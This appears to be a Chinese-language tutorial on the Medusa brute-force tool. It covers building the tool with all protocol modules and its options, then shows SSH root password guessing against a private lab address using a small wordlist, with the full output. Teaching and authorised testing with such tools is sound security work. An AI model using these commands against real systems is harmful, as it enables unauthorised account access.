(1).美杜莎介绍
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的暴力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。
官方网站:http://foofus.net/goons/jmk/medusa/medusa.html
GitHub地址:https://github.com/jmk-foofus/medusa
官网提供tar.gz包,GitHub提供zip包
(2).安装Medusa
安装依赖包
[root@youxi1 ~]# yum -y install libssh2-devel libssh2-devel libtool libtool-ltdl libtool-ltdl-devel
将下载好的压缩包上传,解压编译安装
[root@youxi1 ~]# tar xf medusa-2.2.tar.gz
[root@youxi1 ~]# cd medusa-2.2/
[root@youxi1 medusa-2.2]# ./configure --enable-debug=yes --enable-module-afp=yes
--enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes
--enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes
--enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes
--enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes
--enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes
--enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes
--enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes
--enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes
--enable-module-web-form=yes
[root@youxi1 medusa-2.2]# echo $?
0
[root@youxi1 medusa-2.2]# make && make install
[root@youxi1 medusa-2.2]# echo $?
0
[root@youxi1 medusa-2.2]# ls /usr/local/lib/medusa/modules/ //查看已经生成的模块
afp.mod mysql.mod rexec.mod snmp.mod web-form.mod
cvs.mod ncp.mod rlogin.mod ssh.mod wrapper.mod
ftp.mod nntp.mod rsh.mod svn.mod
http.mod pcanywhere.mod smbnt.mod telnet.mod
imap.mod pop3.mod smtp.mod vmauthd.mod
mssql.mod postgres.mod smtp-vrfy.mod vnc.mod
(3).Medusa使用方法
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
选项说明:
-h [TEXT] 目标主机名称或者IP地址
-H [FILE] 包含目标主机名称或者IP地址文件
-u [TEXT] 测试的用户名
-U [FILE] 包含测试的用户名文件
-p [TEXT] 测试的密码
-P [FILE] 包含测试的密码文件
-C [FILE] 组合条目文件
-O [FILE] 日志信息文件
-e [n/s/ns] n代表空密码,s代表为密码与用户名相同
-M [TEXT] 模块执行名称
-m [TEXT] 传递参数到模块
-d 显示所有的模块名称
-n [NUM] 使用非默认Tcp端口
-s 启用SSL
-r [NUM] 重试间隔时间,默认为3秒
-t [NUM] 设定线程数量
-T 同时测试的主机总数
-L 并行化,每个用户使用一个线程
-f 在任何主机上找到第一个账号/密码后,停止破解
-F 在任何主机上找到第一个有效的用户名/密码后停止审计。
-q 显示模块的使用信息
-v [NUM] 详细级别(0-6)
-w [NUM] 错误调试级别(0-10)
-V 显示版本
-Z [TEXT] 继续扫描上一次
(4).实例
指定主机,指定用户,测试单个密码
[root@youxi1 medusa-2.2]# cd
[root@youxi1 ~]# echo 192.168.5.101 > host.txt
[root@youxi1 ~]# echo root > users.txt
[root@youxi1 ~]# medusa -M ssh -H host.txt -U users.txt -p 123456
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.5.101 User: root Password: 123456 [SUCCESS]
指定主机,指定用户,测试多个密码
[root@youxi1 ~]# vim p.txt //自己建立一个测试字典
1234567890
PASSWORD
password
1234abcd
abcd1234
ABCDEFGH
abcdefgh
123456
[root@youxi1 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234567890 (1 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: PASSWORD (2 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (3 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234abcd (4 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: abcd1234 (5 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: ABCDEFGH (6 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: abcdefgh (7 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (8 of 8 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.5.101 User: root Password: 123456 [SUCCESS]
使用-O选项将破解的密码保存到指定文件中
[root@youxi1 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt -O password.txt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234567890 (1 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: PASSWORD (2 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (3 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234abcd (4 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: abcd1234 (5 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: ABCDEFGH (6 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: abcdefgh (7 of 8 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.101 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (8 of 8 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.5.101 User: root Password: 123456 [SUCCESS]
[root@youxi1 ~]# cat password.txt //查看
# Medusa v.2.2 (2019-09-02 11:46:53)
# medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt -O password.txt
ACCOUNT FOUND: [ssh] Host: 192.168.5.101 User: root Password: 123456 [SUCCESS]
# Medusa has finished (2019-09-02 11:47:07).
字典文件可以到网上下载